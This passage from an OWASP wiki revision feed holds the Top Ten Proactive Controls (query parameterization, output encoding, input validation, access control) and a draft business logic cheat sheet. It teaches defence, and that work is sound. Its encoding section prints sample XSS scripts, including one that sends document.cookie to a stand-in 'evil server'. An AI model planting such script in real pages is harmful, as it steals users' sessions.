Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. Forms of encoding needing to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). Encoding needed to stop other forms of injection include unix encoding, windows encoding, LDAP encoding, XML encoding and others.<br />
<br />
'''Key References'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project]<br />
* [https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project OWASP Encoder Comparison Reference Project]<br />
* [http://msdn.microsoft.com/en-us/security/aa973814.aspx Microsoft .NET AntiXSS Library]<br />
<br />
<br />
== 3: Validate All Inputs ==<br />
<br />
It is critical to treat all input from outside of the application (for example, from browsers or mobile clients, from outside systems or files) as untrusted. For web applications this includes HTTP headers, cookies, and GET and POST parameters: any or all of this data could be compromised by an attacker.<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types of input validation: “white list" validation and "black list" validation. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively because it can be bypassed through encoding and other obfuscation techniques, and is not recommended when building a secure web application. The following examples will focus on white list validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation white list of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
'''Key References''' <br />
* [[Input Validation Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_JSON_Sanitizer OWASP JSON Sanitizer Project]<br />
* [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer OWASP Java HTML Sanitizer Project]<br />
* [http://commons.apache.org/proper/commons-validator/ Apache Commons Validator]<br />
<br />
<br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature of resource should be granted or denied. It should be noted that authorization is not equivalent to authentication (verifying identity). These terms and their definitions are frequently confused. <br />
<br />
Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security software design that must be heavily thought-through up front. <br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The opposite is a more security-centric design. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a users role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/OWASP_PHPRBAC_Project OWASP PHPRBAC Project]<br />
* [http://shiro.apache.org/authorization-features.html Apache Shiro Authorization features]<br />
<br />
<br />
== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br />
<br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Use Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Use Encryption at Rest ===<br />
<br />
Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level crypto on your own, ensure you are or have the assistance of a deep applied crypto expert. Consider well vetted cryptographic libraries such as the [https://code.google.com/p/keyczar/ Google KeyCzar] project. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issue in complex software. <br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/O-Saft OWASP SSL Audit for Testers]<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
<br />
== 7: Implement Logging and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The [[OWASP AppSensor Project]] defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. <br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br />
<br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* [http://static.springsource.org/spring-security/site/index.html Spring Security]<br />
* [http://shiro.apache.org/ Apache Shiro]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet PHP Security Cheat Sheet]<br />
* [https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet .NET Security Cheat Sheet]<br />
<br />
<br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model]<br />
* [[Business Logic Security Cheat Sheet]]<br />
* [[Testing for business logic (OWASP-BL-001)]]<br />
<br />
<br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (OpenSAMM)]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project Application Security Verification Standard Project]<br />
* [https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet Application Security Architecture Cheat Sheet]<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* [[Threat Modeling Cheat Sheet]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
End of April : Complete community review process<br/><br />
End of May : Release final document in well designed PDF form<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=Business_Logic_Security_Cheat_Sheet&diff=176454Business Logic Security Cheat Sheet2014-06-05T15:55:40Z<p>Jim Bird: </p>
<hr />
<div>= DRAFT CHEAT SHEET - WORK IN PROGRESS =<br />
<br />
= Introduction =<br />
<br />
This cheat sheet provides some guidance for identifying some of the various types of business logic vulnerabilities and some guidance for preventing and testing for them.<br />
<br />
= What is a Business Logic Vulnerability? =<br />
<br />
A business logic vulnerability is one that allows the attacker to misuse an application by circumventing the business rules. Most security problems are weaknesses in an application that result from a broken or missing security control (authentication, access control, input validation, etc...). By contrast, business logic vulnerabilities are ways of using the legitimate processing flow of an application in a way that results in a negative consequence to the organization. <br />
<br />
Many articles that describe business logic problems simply take an existing and well understood web application security problem and discuss the business consequence of the vulnerability. True business logic problems are actually different from the typical security vulnerability. Too often, the business logic category is used for vulnerabilities that can't be scanned for automatically. This makes it very difficult to apply any kind of categorization scheme. A useful rule-of-thumb to use is that if you need to truly understand the business to understand the vulnerability, you might have a business-logic problem on your hands. If you don't understand the business, then it's probably just a typical application vulnerability in one of the other categories.<br />
<br />
For example, an electronic bulletin board system was designed to ensure that initial posts do not contain profanity based on a list that the post is compared against. If a word on the list is found the submission is not posted. But, once a submission is posted the submitter can access, edit, and change the submission contents to include words included on the profanity list since on edit the posting is never compared again. <br />
<br />
Testing for business rules vulnerabilities involves developing business logic abuse cases with the goal of successfully completing the business process while not complying with one or more of the business rules.<br />
<br />
= 1. Identify Business Rules and Derive Test/Abuse Cases =<br />
<br />
The first step is to identify the business rules that you care about and turn them into experiments designed to verify whether the application properly enforces the business rule. For example, if the rule is that purchases over $1000 are discounted by 10%, then positive and negative tests should be designed to ensure that<br />
#) the control is in place to implement the business rule,<br />
#) the control is implemented correctly and cannot be bypassed or tampered with, and<br />
#) the control is used properly in all the necessary places<br />
<br />
Business rules vulnerabilities involve any type of vulnerability that allows the attacker to misuse an application in a way that will allow them to circumvent any business rules, constraints or restrictions put in place to properly complete the business process. <br />
For example, on a stock trading application is the attacker allowed to start a trade at the beginning of the day and lock in a price, hold the transaction open until the end of the day, then complete the sale if the stock price has risen or cancel out if the price dropped. <br />
Business Logic testing uses many of the same testing tools and techniques used by functional testers. While a majority of Business Logic testing remains an art relying on the manual skills of the tester, their knowledge of the complete business process, and its rules, the actual testing may involve the use of some functional and security testing tools.<br />
<br />
= 2. Consider Time Related Business Rules =<br />
<br />
TBD: Can the application be used to change orders after they are committed, make transactions appear in the wrong sequence, etc...<br />
<br />
The application must be time-aware and not allow attackers to hold transactions open preventing them completing until and unless it is advantageous to do so. <br />
<br />
= 3. Consider Money Related Business Rules =<br />
<br />
TBD: These should cover financial limits and other undesirable transactions. Can the application be used to create inappropriate financial transactions? Does it allow the use of NaN or Infinity? Are inaccuracies introduced because of the data structures used to model money?<br />
<br />
= 4. Consider Process Related Business Rules =<br />
<br />
TBD: This is for steps in a process, approvals, communications, etc... Can the application be used to bypass or otherwise abuse the steps in a process?<br />
<br />
Workflow vulnerabilities involve any type of vulnerability that allows the attacker to misuse an application in a way that will allow them to circumvent the designed workflow or continue once the workflow has been broken. For example, an ecommerce site that give loyalty points for each dollar spent should not apply points to the customer’s account until the transaction is tendered. Applying points to the account before tendering may allow the customer to cancel the transaction and incorrectly receive points.<br />
<br />
The application must have checks in place ensuring that the users complete each step in the process in the correct order and prevent attackers from circumventing any steps/processes in the workflow. <br />
Test for workflow vulnerabilities involves attempts to execute the steps in the process in an inappropriate order. <br />
<br />
= 5. Consider Human Resource Business Rules =<br />
<br />
TBD: This is for rules surrounding HR. Could the application be used to violate any HR procedures or standards<br />
<br />
= 6. Consider Contractual Relationship Business Rules =<br />
<br />
TBD: Can the application be used in a manner that is inconsistent with any contractual relationships -- such as a contract with a service provider<br />
<br />
= 7. TBD - Let's think of some other REAL Business Rules =<br />
<br />
<br />
<br />
= Related Articles =<br />
<br />
WARNING: Most of the examples discussed in these articles are not actually business logic flaws<br />
<br />
* Seven Business Logic Flaws That Put Your Website At Risk – Jeremiah Grossman Founder and CTO, WhiteHat Security – <br />
https://www.whitehatsec.com/assets/WP_bizlogic092407.pdf<br />
* Top 10 Business Logic Attack Vectors Attacking and Exploiting Business Application Assets and Flaws – Vulnerability Detection to Fix - http://www.ntobjectives.com/go/business-logic-attack-vectors-white-paper/ and http://www.ntobjectives.com/files/Business_Logic_White_Paper.pdf<br />
* CWE-840: Business Logic Errors - http://cwe.mitre.org/data/definitions/840.html<br />
<br />
= Authors and Primary Editors =<br />
<br />
Ashish Rao rao.ashish20[at]gmail.com<br/><br />
David Fern dfern[at]verizon.net<br />
<br />
== Other Cheatsheets ==<br />
{{Cheatsheet_Navigation}}<br />
<br />
[[Category:Cheatsheets]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=176453OWASP Proactive Controls2014-06-05T15:34:55Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be inherent flaws in requirements and designs. When it comes to web security, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls complete document here].<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the top control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls full description].<br />
<br />
== News and Events ==<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br />
<br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of Query Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* [https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide OWASP Secure Coding Practices Quick Reference Guide]<br />
<br />
<br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. A specific example of encoding is output encoding necessary to prevent Cross Site Scripting. <br />
<br />
Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in the user's browser and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. Forms of encoding needing to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). Encoding needed to stop other forms of injection include unix encoding, windows encoding, LDAP encoding, XML encoding and others.<br />
<br />
'''Key References'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project]<br />
* [https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project OWASP Encoder Comparison Reference Project]<br />
* [http://msdn.microsoft.com/en-us/security/aa973814.aspx Microsoft .NET AntiXSS Library]<br />
<br />
<br />
== 3: Validate All Inputs ==<br />
<br />
It is critical to treat all input from outside of the application (for example, from browsers or mobile clients, from outside systems or files) as untrusted. For web applications this includes HTTP headers, cookies, and GET and POST parameters: any or all of this data could be compromised by an attacker.<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types of input validation: “white list" validation and "black list" validation. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively because it can be bypassed through encoding and other obfuscation techniques, and is not recommended when building a secure web application. The following examples will focus on white list validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation white list of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
